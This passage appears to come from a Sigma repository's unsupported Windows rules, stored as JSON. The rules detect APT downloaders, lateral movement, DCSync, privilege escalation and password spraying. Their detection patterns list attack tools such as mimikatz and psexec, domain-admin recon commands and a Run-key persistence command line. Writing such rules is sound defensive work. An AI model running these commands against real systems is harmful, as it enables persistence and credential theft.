    "path": "unsupported/windows/proc_creation_win_correlation_apt_silence_downloader_v3.yml",
    "content": "title: Silence.Downloader V3\nid: 170901d1-de11-4de7-bccb-8fa13678d857\nstatus: unsupported\ndescription: Detects Silence downloader. These commands are hardcoded into the binary.\nauthor: Alina Stepchenkova, Roman Rezvukhin, Group-IB, oscd.community\ndate: 2019/11/01\nmodified: 2023/02/24\ntags:\n    - attack.persistence\n    - attack.t1547.001\n    - attack.discovery\n    - attack.t1057\n    - attack.t1082\n    - attack.t1016\n    - attack.t1033\n    - attack.g0091\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_recon:\n        Image|endswith:\n            - '\\tasklist.exe'\n            - '\\qwinsta.exe'\n            - '\\ipconfig.exe'\n            - '\\hostname.exe'\n        CommandLine|contains: '>>'\n        CommandLine|endswith: 'temps.dat'\n    selection_persistence:\n        CommandLine|contains: '/C REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"WinNetworkSecurity\" /t REG_SZ /d'\n    condition: selection_recon | near selection_persistence # requires both\nfields:\n    - ComputerName\n    - User\n    - Image\n    - CommandLine\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_apt_turla_commands_medium.yml",
    "content": "title: Automated Turla Group Lateral Movement\nid: 75925535-ca97-4e0a-a850-00b5c00779dc\nstatus: unsupported\ndescription: Detects automated lateral movement by Turla group\nreferences:\n    - https://securelist.com/the-epic-turla-operation/65545/\nauthor: Markus Neis\ndate: 2017/11/07\nmodified: 2023/02/24\ntags:\n    - attack.g0010\n    - attack.execution\n    - attack.t1059\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.discovery\n    - attack.t1083\n    - attack.t1135\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    netCommand1:\n        CommandLine: 'net view /DOMAIN'\n    netCommand2:\n        CommandLine: 'net session'\n    netCommand3:\n        CommandLine: 'net share'\n    timeframe: 1m\n    condition: netCommand1 | near netCommand2 and netCommand3\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_dnscat2_powershell_implementation.yml",
    "content": "title: DNSCat2 Powershell Implementation Detection Via Process Creation\nid: b11d75d6-d7c1-11ea-87d0-0242ac130003\nstatus: unsupported\ndescription: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.\nreferences:\n    - https://github.com/lukebaggett/dnscat2-powershell\n    - https://blu3-team.blogspot.com/2019/08/powershell-dns-c2-notes.html\n    - https://ragged-lab.blogspot.com/2020/06/it-is-always-dns-powershell-edition.html\nauthor: Cian Heasley\ndate: 2020/08/08\nmodified: 2023/02/24\ntags:\n    - attack.command_and_control\n    - attack.t1071\n    - attack.t1071.004\n    - attack.t1001.003\n    - attack.t1041\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith:\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n        Image|endswith: '\\nslookup.exe'\n        CommandLine|endswith: '\\nslookup.exe'\n    condition: selection | count(Image) by ParentImage > 100\nfields:\n    - Image\n    - CommandLine\n    - ParentImage\nfalsepositives:\n    - Other powershell scripts that call nslookup.exe\nlevel: high\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_multiple_susp_cli.yml",
    "content": "title: Quick Execution of a Series of Suspicious Commands\nid: 61ab5496-748e-4818-a92f-de78e20fe7f1\nstatus: unsupported\ndescription: Detects multiple suspicious process in a limited timeframe\nreferences:\n    - https://car.mitre.org/wiki/CAR-2013-04-002\nauthor: juju4\ndate: 2019/01/16\nmodified: 2023/02/24\ntags:\n    - car.2013-04-002\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - arp.exe\n            - at.exe\n            - attrib.exe\n            - cscript.exe\n            - dsquery.exe\n            - hostname.exe\n            - ipconfig.exe\n            - mimikatz.exe\n            - nbtstat.exe\n            - net.exe\n            - netsh.exe\n            - nslookup.exe\n            - ping.exe\n            - quser.exe\n            - qwinsta.exe\n            - reg.exe\n            - runas.exe\n            - sc.exe\n            - schtasks.exe\n            - ssh.exe\n            - systeminfo.exe\n            - taskkill.exe\n            - telnet.exe\n            - tracert.exe\n            - wscript.exe\n            - xcopy.exe\n            - pscp.exe\n            - copy.exe\n            - robocopy.exe\n            - certutil.exe\n            - vssadmin.exe\n            - powershell.exe\n            - pwsh.exe\n            - wevtutil.exe\n            - psexec.exe\n            - bcedit.exe\n            - wbadmin.exe\n            - icacls.exe\n            - diskpart.exe\n    timeframe: 5m\n    condition: selection | count() by MachineName > 5\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/proc_creation_win_correlation_susp_builtin_commands_recon.yml",
    "content": "title: Reconnaissance Activity Using BuiltIn Commands\nid: 2887e914-ce96-435f-8105-593937e90757\nstatus: unsupported\ndescription: Detects execution of a set of builtin commands often used in recon stages by different attack groups\nreferences:\n    - https://twitter.com/haroonmeer/status/939099379834658817\n    - https://twitter.com/c_APT_ure/status/939475433711722497\n    - https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html\nauthor: Florian Roth (Nextron Systems), Markus Neis\ndate: 2018/08/22\nmodified: 2023/02/24\ntags:\n    - attack.discovery\n    - attack.t1087\n    - attack.t1082\n    - car.2016-03-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - CommandLine:\n            - tasklist\n            - net time\n            - systeminfo\n            - whoami\n            - nbtstat\n            - net start\n            - qprocess\n            - nslookup\n            - hostname.exe\n            - 'netstat -an'\n        - CommandLine|endswith:\n            - '\\net1 start'\n            - '\\net1 user /domain'\n            - '\\net1 group /domain'\n            - '\\net1 group \"domain admins\" /domain'\n            - '\\net1 group \"Exchange Trusted Subsystem\" /domain'\n            - '\\net1 accounts /domain'\n            - '\\net1 user net localgroup administrators'\n    timeframe: 15s\n    condition: selection | count() by CommandLine > 4\nfalsepositives:\n    - False positives depend on scripts and administrative tools used in the monitored environment\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml",
    "content": "title: MSI Spawned Cmd and Powershell Spawned Processes\nid: 38cf8340-461b-4857-bf99-23a41f772b18\ndescription: This rule looks for Windows Installer service (msiexec.exe) spawning command line and/or powershell that spawns other processes\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020/10/13\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg\n    - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\ntags:\n    - attack.privilege_escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\n    definition: Works only if  Enrich Sysmon events with additional information about process in ParentOfParentImage check enrichment section\ndetection:\n    parent_image:\n        ParentImage|endswith:\n            - '\\cmd.exe'\n            - '\\powershell.exe'\n    parent_of_parent_image:\n        ParentOfParentImage|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        ParentOfParentImage|endswith:\n            - 'tmp'\n    condition: parent_image and parent_of_parent_image\nfields:\n    - ParentImage\n    - ParentOfParentImage\nfalsepositives:\n    - Unknown\nlevel: high\nenrichment:\n    - EN_0001_cache_sysmon_event_id_1_info                # http://bit.ly/314zc6x\n    - EN_0002_enrich_sysmon_event_id_1_with_parent_info   # http://bit.ly/2KmSC0l\n"
  },
  {
    "path": "unsupported/windows/sysmon_always_install_elevated_parent_child_correlated.yml",
    "content": "title: Always Install Elevated Parent Child Correlated\nid: 078235c5-6ec5-48e7-94b2-f8b5474379ea\ndescription: This rule will looks any process with low privilege launching Windows Installer service (msiexec.exe) that tries to install MSI packages with SYSTEM privilege\n#look for MSI start by low privilege user, write the process guid to the suspicious_guid variable\n#look for child process from the suspicious_guid, alert if it's Windows Installer trying to install package with SYSTEM privilege\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community\ndate: 2020/10/13\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg\ntags:\n    - attack.privilege_escalation\n    - attack.t1548.002\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    system_integrity:\n        IntegrityLevel: 'System'\n    system_user:\n        User: 'NT AUTHORITY\\SYSTEM'\n    image_1:\n        Image|contains|all:\n            - '\\Windows\\Installer\\'\n            - 'msi'\n        Image|endswith:\n            - 'tmp'\n    image_2:\n        Image|endswith: '\\msiexec.exe'\n    child_of_suspicious_guid:\n        ParentProcessGuid: '%suspicious_guid%'\n    condition: write ProcessGuid from (event_id and image_2 and not system_user) to %suspicious_guid%; then if (child_of_suspicious_guid and event_id and image_1 and system_user) or (suspicious_guid and event_id and image_2 and system_user and integrity_level) -> alert\nfields:\n    - EventID\n    - IntegrityLevel\n    - User\n    - Image\n    - ParentProcessGuid\nfalsepositives:\n    - System administrator usage\nlevel: high"
  },
  {
    "path": "unsupported/windows/sysmon_non_priv_program_files_move.yml",
    "content": "title: Files Dropped to Program Files by Non-Priviledged Process\nid: d6d9f4fb-4c1c-4f53-b306-62a22c7c61e1\ndescription: Search for dropping of files to Windows/Program Files fodlers by non-priviledged processes\nstatus: experimental\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020/10/17\nmodified: 2021/08/14\nreferences:\n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-37-638.jpg\ntags:\n    - attack.persistence\n    - attack.defense_evasion\n    - attack.t1574\n    - attack.t1574.010\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    integrity:\n        IntegrityLevel: 'Medium'\n    program_files:\n        TargetFilename|contains:\n            - '\\Program Files\\'\n            - '\\Program Files (x86)\\'\n    windows:\n        TargetFilename|startswith: '\\Windows\\'\n    temp:\n        TargetFilename|contains: 'temp'\n    condition: integrity and (program_files or windows and not temp)\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/sysmon_process_reimaging.yml",
    "content": "action: global\ntitle: Defense evasion via process reimaging\nid: 7fa4f550-850e-4117-b543-428c86ebb849\ndescription: Detects process reimaging defense evasion technique\n# where\n#             selection1: ImageFileName != selection1: OriginalFileName\n#             selection1: ParentProcessGuid = selection2: ProcessGuid\n#             selection1: Image = selection2: TargetFilename\n# and new field ImageFileName is coming from enrichment\n#             selection1: Image = ^.+\\\\<ImageFileName>$\n# Rule must trigger if selection1 and selection2 both occurs in timeframe of 120 sec.\n# Rule logic is currently not supported by SIGMA.\n# Sysmon v.10.0 or newer is required for proper detection.\nstatus: unsupported\nauthor: Alexey Balandin, oscd.community\nreferences:\n    - https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/in-ntdll-i-trust-process-reimaging-and-endpoint-security-solution-bypass/\ntags:\n    - attack.defense_evasion\ndate: 2019/10/25\nmodified: 2021/12/02\ndetection:\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection1:\n        category: process_creation\nfields:\n    - Image\n    - OriginalFileName\n    - ParentProcessGuid\nnew_fields:\n    - ImageFileName\n---\nlogsource:\n    product: windows\n    service: sysmon\ndetection:\n    selection2:\n        EventID: 11\nfields:\n    - ProcessGuid\n    - TargetFilename\n"
  },
  {
    "path": "unsupported/windows/win_access_fake_files_with_stored_credentials.yml",
    "content": "title: Stored Credentials in Fake Files\nid: 692b979c-f747-41dc-ad72-1f11c01b110e\ndescription: Search for accessing of fake files with stored credentials\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community\ndate: 2020/10/05\nreferences: \n    - https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-13-638.jpg\ntags:\n    - attack.credential_access\n    - attack.t1555\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4663\n        AccessList|contains: '%%4416'\n        ObjectName|endswith:\n            - '\\%POLICY_ID%\\Machine\\Preferences\\Groups\\Groups.xml'\n            - '\\%FOLDER_NAME%\\Unattend.xml'\n    condition: selection\nfields:\n    - EventID\n    - AccessList\n    - ObjectName\nfalsepositives:\n    - Unknown\nlevel: high"
  },
  {
    "path": "unsupported/windows/win_apt_apt29_tor.yml",
    "content": "action: global\ntitle: APT29 Google Update Service Install\ndescription: This method detects malicious services mentioned in APT29 report by FireEye. The legitimate path for the Google update service is C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\n    so the service names and executable locations used by APT29 are specific enough to be detected in log files.\nreferences:\n    - https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html\ntags:\n    - attack.persistence\n    - attack.g0016\n    - attack.t1050          # an old one\n    - attack.t1543.003\ndate: 2017/11/01\nmodified: 2022/03/21\nauthor: Thomas Patzke\nstatus: unsupported\nlogsource:\n    product: windows\n    service: system\ndetection:\n    service_install:\n        EventID: 7045\n        Provider_Name: 'Service Control Manager'\n        ServiceName: 'Google Update'\n    timeframe: 5m\n    condition: service_install | near process\nfalsepositives:\n    - Unknown\nlevel: high\n---\nid: c069f460-2b87-4010-8dcf-e45bab362624\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    process:\n        Image:\n            - 'C:\\Program Files(x86)\\Google\\GoogleService.exe'\n            - 'C:\\Program Files(x86)\\Google\\GoogleUpdate.exe'\nfields:\n    - ComputerName\n    - User\n    - CommandLine\n"
  },
  {
    "path": "unsupported/windows/win_dumping_ntdsdit_via_dcsync.yml",
    "content": "title: Dumping ntds.dit remotely via DCSync\nid: 51238c62-2b29-4539-ad75-e94575368a12\ndescription: ntds.dit retrieving using synchronisation with legitimate domain controller using Directory Replication Service Remote Protocol\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/10/24\nmodified: 2019/11/13\nreferences:\n    - https://twitter.com/gentilkiwi/status/1003236624925413376\n    - https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4624\n        ComputerName: '%DomainControllersNamesList%'\n    selection2:\n        IpAddress: '%DomainControllersIpsList%'\n    selection3:\n        EventID: 4662\n        ComputerName: '%DomainControllersNamesList%'\n        SubjectLogonId: '%SuspiciousTargetLogonIdList%'\n        Properties|contains: \n            - '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2'\n            - '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'\n    condition: write TargetLogonId from selection1 (if not selection2) to list %SuspiciousTargetLogonIdList%; then if selection3 -> alert\nfalsepositives:\n    - Legitimate administrator adding new domain controller to already existing domain\nlevel: medium\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/windows/win_dumping_ntdsdit_via_netsync.yml",
    "content": "title: Dumping ntds.dit remotely via NetSync\nid: 757b2a11-73e7-411a-bd46-141d906e0167\ndescription: ntds.dit retrieving (only computer accounts) using synchronisation with legit domain controller using Netlogon Remote Protocol\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019/11/01\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\ntags:\n    - attack.credential_access\n    - attack.t1003\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4624\n        ComputerName: '%DomainControllersNamesList%'\n    selection2:\n        IpAddress: '%DomainControllersIpsList%'\n    selection3:\n        EventID: 5145\n        ComputerName: '%DomainControllersNamesList%'\n        ShareName|contains: '\\IPC$'\n        SubjectLogonId: '%SuspiciousTargetLogonIdList%'\n        RelativeTargetName: 'netlogon'\n    condition: write TargetLogonId from selection1 (if not selection2) to list %SuspiciousTargetLogonIdList%; then if selection3 -> alert\nfalsepositives:\n    - Legitimate administrator adding new domain controller to already existing domain\nlevel: medium\nstatus: unsupported\n"
  },
  {
    "path": "unsupported/windows/win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml",
    "content": "title: Windows Kernel and 3rd-Party Drivers Exploits Token Stealing\nid: 8065b1b4-1778-4427-877f-6bf948b26d38\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with non-SYSTEM privileges and Medium integrity level\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\ntags:\n    - attack.privilege_escalation\n    - attack.t1068\nstatus: unsupported\nauthor: Teymur Kheirkhabarov (source), Daniil Yugoslavskiy (rule)\ndate: 2019/06/03\nlogsource:\n    category: process_creation\n    product: windows\n    definition: Works only if  Enrich Sysmon events with additional information about process in ParentIntegrityLevel check enrichment section\ndetection:\n    selection:\n        ParentIntegrityLevel: Medium\n        IntegrityLevel: System\n        User: \"NT AUTHORITY\\\\SYSTEM\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n\n"
  },
  {
    "path": "unsupported/windows/win_mal_service_installs.yml",
    "content": "title: Malicious Service Installations\nid: 2cfe636e-317a-4bee-9f2c-1066d9f54d1a\ndescription: Detects known malicious service installs that only appear in cases of lateral movement, credential dumping, and other suspicious activities.\nauthor: Florian Roth (Nextron Systems), Daniil Yugoslavskiy, oscd.community (update)\ndate: 2017/03/27\nmodified: 2022/03/21\nreferences:\n    - https://awakesecurity.com/blog/threat-hunting-for-paexec/\n    - https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html\n    - https://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\ntags:\n    - attack.persistence\n    - attack.privilege_escalation\n    - attack.t1003\n    - attack.t1035          # an old one\n    - attack.t1050          # an old one\n    - car.2013-09-005\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    malsvc_paexec:\n        ImagePath|contains: '\\PAExec'\n    malsvc_wannacry:\n        ServiceName: 'mssecsvc2.0'\n    malsvc_persistence:\n        ImagePath|contains: 'net user'\n    malsvc_apt29:\n        ServiceName: 'Java(TM) Virtual Machine Support Service'\n    condition: selection and 1 of malsvc_*\nfalsepositives:\n    - Unknown\nlevel: critical\nstatus: unsupported"
  },
  {
    "path": "unsupported/windows/win_metasploit_or_impacket_smb_psexec_service_install.yml",
    "content": "title: Metasploit Or Impacket Service Installation Via SMB PsExec\nid: 1a17ce75-ff0d-4f02-9709-2b7bb5618cf0\ndescription: Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket psexec.py by triggering on specific service installation\nauthor: Bartlomiej Czyz, Relativity\ndate: 2021/01/21\nmodified: 2022/03/21\nreferences:\n    - https://bczyz1.github.io/2021/01/30/psexec.html\ntags:\n    - attack.lateral_movement\n    - attack.t1021.002\n    - attack.t1570\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_1:\n        ImagePath|re: '^%systemroot%\\\\[a-zA-Z]{8}\\.exe$'\n        ServiceName|re: '(^[a-zA-Z]{4}$)|(^[a-zA-Z]{8}$)|(^[a-zA-Z]{16}$)'\n        StartType: '3'  # on-demand start, see https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4697\n        ServiceType: '0x10'\n    filter:\n        ServiceName: 'PSEXESVC'\n    condition: selection and selection_1 and not filter\nfields:\n    - ComputerName\n    - SubjectDomainName\n    - SubjectUserName\n    - ServiceName\n    - ServiceFileName\nfalsepositives:\n    - Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name\nlevel: high\nstatus: unsupported"
  },
  {
    "path": "unsupported/windows/win_possible_privilege_escalation_using_rotten_potato.yml",
    "content": "title: Detection of Possible Rotten Potato\nid: 6c5808ee-85a2-4e56-8137-72e5876a5096\ndescription: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE privileges\nreferences:\n    - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n    - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/\ntags:\n    - attack.privilege_escalation\n    - attack.t1134           # an old one\n    - attack.t1134.002\nstatus: unsupported\nauthor: Teymur Kheirkhabarov\ndate: 2019/10/26\nmodified: 2020/09/01\nlogsource:\n    category: process_creation\n    product: windows\n    definition: Works only if  Enrich Sysmon events with additional information about process in ParentUser check enrichment section\ndetection:\n    selection:\n        ParentUser:\n            - 'NT AUTHORITY\\NETWORK SERVICE'\n            - 'NT AUTHORITY\\LOCAL SERVICE'\n        User: 'NT AUTHORITY\\SYSTEM'\n    rundllexception:\n        Image|endswith: '\\rundll32.exe'\n        CommandLine|contains: 'DavSetCookie'\n    condition: selection and not rundllexception\nfalsepositives:\n    - Unknown\nlevel: high\nenrichment:\n    - EN_0001_cache_sysmon_event_id_1_info                # http://bit.ly/314zc6x\n    - EN_0002_enrich_sysmon_event_id_1_with_parent_info   # http://bit.ly/2KmSC0l\n"
  },
  {
    "path": "unsupported/windows/win_remote_schtask.yml",
    "content": "title: Remote Schtasks Creation\nid: cf349c4b-99af-40fa-a051-823aa2307a84\nstatus: unsupported\ndescription: Detects remote execution via scheduled task creation or update on the destination host\nauthor: Jai Minton, oscd.community\ndate: 2020/10/05\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\ntags:\n    - attack.lateral_movement\n    - attack.persistence\n    - attack.execution\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft).'\ndetection:\n    selection1:\n        EventID: 4624\n        Logon_Type: 3\n    selection2:\n        EventID:\n            - 4698\n            - 4702\n    filter1: \n        Source_Network_Address:\n            - '::1'\n            - '127.0.0.1'\n    filter2: \n        Source_Network_Address: '-'\n    timeframe: 30d\n    condition: (selection1 and not filter1) or selection2 and not filter2\n    #   where:\n    #       selection1: TargetLogonID = selection2: SubjectLogonID, grouped by host over 30seconds | eventcount > 1\n    #   Rule should trigger where the SubjectLogonID from event 4698 or 4702 is the same as the TargetLogonID from event 4624 with a Logon_Type of 3, in a 30second period, provided its from the same host.\n    #   This logic would be similar to the Splunk 'Transaction' operator which groups related events over a timeframe. \n    #       This takes both field values (e.g. Logon_ID), and an expression provided (e.g. startswith=(EventCode=4624) maxspan=30s) which occurs over the raw event log to find events, at which point a Union based on the criteria provided occurs to merge these events into a single transaction.\n    #   This is similar to stats as an aggregation function, but allows you to see the raw text of events rather than to calculate stats on then, and it retains the raw event to allow an eval expression to occur for grouping. This is beneficial as fields such as LogonIDs are reused over time. \n    #   By having this you can group logon events to their remote schtask creation event (as it is searching for a logon followed by a schtask creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another.\n    #   Rule logic is currently not supported by SIGMA.\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_remote_service.yml",
    "content": "action: global\ntitle: Remote Service Creation\nid: 4a3a2b96-d7fc-4cb9-80e4-4a545fe95f46\nstatus: unsupported\ndescription: Detects remote execution via service creation on the destination host\nauthor: Jai Minton, oscd.community\ndate: 2020/10/05\nreferences:\n    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view\ntags:\n    - attack.lateral_movement\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003 \ndetection:\n    selection1:\n        EventID: 4624\n        Logon_Type: 3\n    filter1: \n        Source_Network_Address:\n            - '::1'\n            - '127.0.0.1'\n    timeframe: 30s\n    condition: (selection1 and not filter1) or selection2\n    #   where:\n    #       selection1: TargetLogonID = selection2: SubjectLogonID, grouped by host over 30seconds | eventcount > 1\n    #   Rule should trigger where the SubjectLogonID from event 7045 is the same as the TargetLogonID from event 4624 with a Logon_Type of 3, in a 30second period, provided its from the same host.\n    #   This logic would be similar to the Splunk 'Transaction' operator which groups related events over a timeframe. \n    #       This takes both field values (e.g. host), and an expression provided (e.g. startswith=(EventCode=4624) maxspan=30s) which occurs over the raw event log to find events, at which point a Union based on the criteria provided occurs to merge these events into a single transaction.\n    #   This is similar to stats as an aggregation function, but allows you to see the raw text of events rather than to calculate stats on then, and it retains the raw event to allow an eval expression to occur for grouping. This is beneficial as fields such as LogonIDs are reused over time. \n    #   By having this you can group logon events to their remote service creation event (as it is searching for a logon followed by a service creation) even by using a search timeframe over a long period of time e.g. 30days without running the risk of incorrectly grouping a logonID at one time, to a task creation at another.\n    #   Rule logic is currently not supported by SIGMA.\n    \nfalsepositives:\n    - Unknown\nlevel: medium\n---\n logsource:\n     product: windows\n     service: security\n detection:\n     selection2:\n         EventID: 4697\n---\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection2:\n        EventID: 7045"
  },
  {
    "path": "unsupported/windows/win_security_global_catalog_enumeration.yml",
    "content": "title: Enumeration via the Global Catalog\nid: 619b020f-0fd7-4f23-87db-3f51ef837a34\nstatus: unsupported\ndescription: Detects enumeration of the global catalog (that can be performed using BloodHound or others AD reconnaissance tools). Adjust Threshold according to domain width.\nreferences:\n    - https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156\nauthor: Chakib Gzenayi (@Chak092), Hosni Mribah\ndate: 2020/05/11\nmodified: 2023/02/24\ntags:\n    - attack.discovery\n    - attack.t1087.002\nlogsource:\n    product: windows\n    service: security\n    definition: 'The advanced audit policy setting \"Windows Filtering Platform > Filtering Platform Connection\" must be configured for Success'\ndetection:\n    selection:\n        EventID: 5156\n        DestPort:\n            - 3268\n            - 3269\n    timeframe: 1h\n    condition: selection | count() by SourceAddress > 2000\nfalsepositives:\n    - Exclude known DCs.\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_rare_schtasks_creations.yml",
    "content": "title: Rare Schtasks Creations\nid: b0d77106-7bb0-41fe-bd94-d1752164d066\nstatus: unsupported\ndescription: Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code\nauthor: Florian Roth (Nextron Systems)\ndate: 2017/03/23\nmodified: 2023/02/24\ntags:\n    - attack.execution\n    - attack.privilege_escalation\n    - attack.persistence\n    - car.2013-08-001\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: security\n    definition: 'The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to allow this detection (not in the baseline recommendations by Microsoft). We also recommend extracting the Command field from the embedded XML in the event data.'\ndetection:\n    selection:\n        EventID: 4698\n    timeframe: 7d\n    condition: selection | count() by TaskName < 5\nfalsepositives:\n    - Software installation\n    - Software updates\nlevel: low\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_explicit_credentials.yml",
    "content": "title: Password Spraying via Explicit Credentials\nid: 196a29c2-e378-48d8-ba07-8a9e61f7fab9\nstatus: unsupported\ndescription: Detects a single user failing to authenticate to multiple users using explicit credentials.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\nauthor: Mauricio Velazco, Zach Mathis\ndate: 2021/06/01\nmodified: 2023/02/24\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection:\n        EventID: 4648\n    filter:\n        SubjectUserName|endswith: '$' # There will be much noise from computer accounts to UMFD-0, DWM-1, etc...\n    timeframe: 1h\n    condition: selection and not filter | count(TargetUserName) by SubjectUserName > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_process.yml",
    "content": "title: Multiple Users Failing to Authenticate from Single Process\nid: fe563ab6-ded4-4916-b49f-a3a8445fe280\nstatus: unsupported\ndescription: Detects failed logins with multiple accounts from a single process on the system.\nreferences:\n    - https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying\n    - https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing\nauthor: Mauricio Velazco\ndate: 2021/06/01\nmodified: 2023/03/13\ntags:\n    - attack.t1110.003\n    - attack.initial_access\n    - attack.privilege_escalation\nlogsource:\n    product: windows\n    service: security\ndetection:\n    selection1:\n        EventID: 4625\n        LogonType: 2\n    filter:\n        ProcessName: '-'\n    timeframe: 24h\n    condition: selection1 and not filter | count(TargetUserName) by ProcessName > 10\nfalsepositives:\n    - Terminal servers\n    - Jump servers\n    - Other multiuser systems like Citrix server farms\n    - Workstations with frequently changing users\nlevel: medium\n"
  },
  {
    "path": "unsupported/windows/win_security_susp_failed_logons_single_source.yml",
